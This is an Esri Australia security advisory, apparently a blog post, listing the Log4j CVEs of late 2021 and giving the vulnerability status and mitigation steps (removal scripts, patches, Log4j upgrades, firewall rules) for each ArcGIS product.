13 December 2021
Esri has released the following critical ArcGIS Software Security Alert information on the following Log4j library vulnerabilities:
- CVE-2021-44228 – Log4j 2.x JNDILookup RCE fix 1
– Disclosed 12/9/21 – Critical - CVE-2021-45046 – Log4j 2.x JNDILookup fix 2
– Disclosed 12/14/21 – Critical - CVE- 2021-4104 – Log4j 1.2 JMSAppender
– Disclosed 12/14/21 – High - CVE-2021-45105 – Log4j 2.x Context Lookups DoS
– Disclosed on 12/18/21 – High - CVE-2021-44832 – Log4j 2.x JDBCAppender
- – Disclosed 12/28/21 – Medium
ArcGIS and Apache Log4j Vulnerabilities
Last updated 4/02/2022
The CyberSecurity & Infrastructure Security Agency (CISA), provides a useful summary of Log4j vulnerability guidance that customers may want to reference in addition to our product-specific recommendations. Two aspects your organization should consider implementing are alerting and blocking mechanisms for this issue. To help ease implementing the CISA recommended blocking mechanism of a Web Application Firewall (WAF) with Esri products, we have a Web Application Filter Rules guide located within the customer accessible documents area of the ArcGIS Trust Center.
Note that the mitigation measures are in alignment with Emergency Directive 22-02 Mitigate Apache Log4 Vulnerability.
ArcGIS Enterprise
Several ArcGIS Enterprise components contain the vulnerable log4j library, however there is no known exploit available for any version of a base ArcGIS Enterprise deployment (including the ArcGIS Server, Portal for ArcGIS, and ArcGIS Data Store components) or stand-alone ArcGIS Server at this time.
Esri has evaluated the potential impact of CVE-2021-45105, an infinite recursion denial-of-service attack against Log4j, in Portal for ArcGIS, ArcGIS Server, and ArcGIS Data Store and determined that those software components do not use the pattern layouts necessary for attackers to exploit the vulnerability.
Out of an abundance of caution, Esri has created Log4Shell mitigation scripts that are strongly recommended to be applied to all installations of ArcGIS Enterprise and ArcGIS Server of any version of the software. The scripts remove the JndiLookup class which is the only mitigation measure recommended by Apache Log4j that does not require updating the Log4j version. The scripts have been validated for versions 10.6 and above, however they should work on older versions of ArcGIS Enterprise and ArcGIS Server as well. Separate detailed instructions and scripts are available for:
- ArcGIS Server – For ArcGIS GIS Server, ArcGIS GeoAnalytics Server, and ArcGIS Image Server
- Portal for ArcGIS
- ArcGIS Data Store
- ArcGIS GeoEvent Server
- ArcGIS Workflow Manager Server
- ArcGIS GeoEnrichment Server
Notes:
- As the scripts require stopping and restarting ArcGIS Enteprise components’ services, we recommend running the scripts outside of business hours or during the scheduled maintenance window.
- After applying the mitigation scripts, you will still see vulnerable Log4j version numbers on these systems, however the vulnerable code has been removed.
- Base ArcGIS Enterprise components do not utilize and are therefore not vulnerable to Log4j 1.2 JMSAppender (CVE-2021-4104) and Log4j 2.x JDBCAppender (CVE-2021-44832)
- The ArcGIS Web Adaptor does not use Log4j core and is therefore not vulnerable.
- ArcGIS Enterprise security patches will be released throughout Q1 2022, with more specific dates posted here as the effort progresses.
- Customers are strongly encouraged to use the supplied scripts rather than waiting for additional patch availability.
The list of frequently asked questions regarding the execution of mitigation scripts is available in the following blog.
ArcGIS Notebook Server
The product consists of two parts, the underlying framework and a Docker container image:
- The underlying framework does not contain Log4j, except for version 10.7.x of the product which does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVE’s in this announcement.
- The Docker container image contains Log4j, however for a person to be able to execute the component they would need to be granted permissions to the notebook container, so Log4j does not present additional RCE risk in this configuration. Patches for the Docker container images will be made available over time.
ArcGIS Monitor
ArcGIS Monitor does not contain Log4j and is therefore not vulnerable to these CVE’s.
ArcGIS Online
Though a Log4j exploit has not been identified for ArcGIS Online, out of an abundance of caution, patching and updates were completed to eliminate the vulnerable code from this FedRAMP authorized SaaS offering.
ArcMap
ArcMap does not include Log4j and is therefore not vulnerable to these CVE’s. See Desktop Extensions section if utilizing optional, separate install extensions.
ArcGIS Pro
All ArcGIS Pro versions under General Availability support contain Log4j, but are not known to be exploitable as the software does not listen for remote traffic. ArcGIS Pro includes Log4j by default to support two functional areas:
ArcGIS Pro GeoAnalytics Desktop Tools
- The underlying Log4j component does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVE’s in this announcement.
- Esri will update the version of Log4j through normal maintenance patches when required interfaces to support Spark are included in V2.17.x+
- Though not known to be exploitable, users can delete the vulnerable Log4j-core jar file from installs of ArcGIS Pro, found here: <ProInstall>/ArcGIS/Pro/bin/Python/envs/arcgispro-py3/Lib/site-packages/saspy/java/iomclient/
- The above action will also disable use of the two Geoprocessing tools SAS to Table and Table to SAS.
- ArcGIS Pro 2.9.1 addresses the recent 2 critical Log4j CVE’s for this component by updating to Log4j 2.16.
- ArcGIS Pro 2.7.5 and 2.8.5 address Log4j CVE’s for this component by updating to Log4j 2.17.1.
See Desktop Extensions section below if utilizing optional, separate install extensions.
Desktop Extensions
Below is a summary of optional (non-default) extensions and their vulnerability status:
ArcGIS Pro Data Interoperability Extension
- This product utilizes components from Safe Software that contains Log4j and the vendor states they are confident their implementation is not susceptible to the vulnerability CVE-2021-44228.
- Safe Software recommends if customers are still concerned with the presence of the unpatched Log4j version, customers can remove the risk of vulnerability by updating Log4j components to the currently patched Log4j version of 2.17.0. Files to update for the Data Interoperability Extension are located at two locations – Please update each of the five log4j files in each location below as specified by Safe Software:
- <DataInterOpExtInstall>/ArcGIS/Data Interoperability for ArcGIS Pro/plugins
ArcMap Data Interoperability Extension
- The underlying Log4j component does NOT include the vulnerable JMSAppender class and is therefore NOT vulnerable to the CVE’s in this announcement.
- Esri will be updating the version of log4j through normal maintenance patches targeting the Data Interoperability Extension.
License Manager
This product utilizes components from Flexera, and Esri does NOT include the vulnerable example files referenced by Flexera in their Log4j statement. Log4j is not included with Esri’s License Manager and is therefore NOT vulnerable to the CVE’s in this announcement.
Esri Geoportal Server
This open-source product was updated to version 2.65 on Dec 17th to resolve Log4j issues, please upgrade to this latest release.
Esri Australia Managed Cloud Services
In response to this vulnerability, a new ruleset has been provided by AWS and enabled as part of the emergency change for all clients by the Esri Australia Security Incident Response Team. This is in addition to the AWS Web Application Firewall that had been deployed to all publicly exposed clients as part of Esri Australia’s security hardening in 2019/2020. The Esri Australia Cloud Services team is currently testing Esri’s Log4Shell mitigation scripts for Enterprise components — ArcGIS Server (including GeoEvent), Portal for ArcGIS, and Data Store — to be applied to all ArcGIS installations. Due to the additional mitigations and the potential for impact on the service provided, a member of Managed Cloud Services will be in touch to discuss any further changes.
If you have any questions or concerns, please contact Esri Australia Technical Support via My Esri, support@esriaustralia.com.au or 1800 447 111.
Esri Australia Technical Blog 